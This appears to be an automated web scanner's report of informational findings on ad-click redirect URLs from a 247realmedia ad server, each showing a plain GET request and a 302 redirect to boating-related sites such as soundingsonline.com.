Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2110013632/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2110013632/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2110013632/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:37:59 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2129286326/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2129286326/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2129286326/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:42:39 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2139721205/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2139721205/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2139721205/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:02:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/21461803/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/21461803/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/21461803/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:46:21 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/222638617/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/222638617/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/222638617/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:42:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/230260175/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/230260175/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/230260175/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/23350838/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/23350838/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.marinalife.com/soundings

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/23350838/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:58:58 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.marinalife.com/soundings
Content-Length: 311
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.marinalife.com/soundings">here</a>.<
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/238495154/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/238495154/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/238495154/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:48:14 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/249777070/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/249777070/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/249777070/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/263374492/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/263374492/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/263374492/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:11:38 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/267480852/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/267480852/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/267480852/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:49:00 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/277699116/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/277699116/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/277699116/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:51:16 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/281105801/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/281105801/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/281105801/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:50:15 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/281847158/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/281847158/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/281847158/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:39:59 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/285317148/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/285317148/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/285317148/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/287333455/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/287333455/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.flashedition.com/publication?i=59172

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/287333455/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
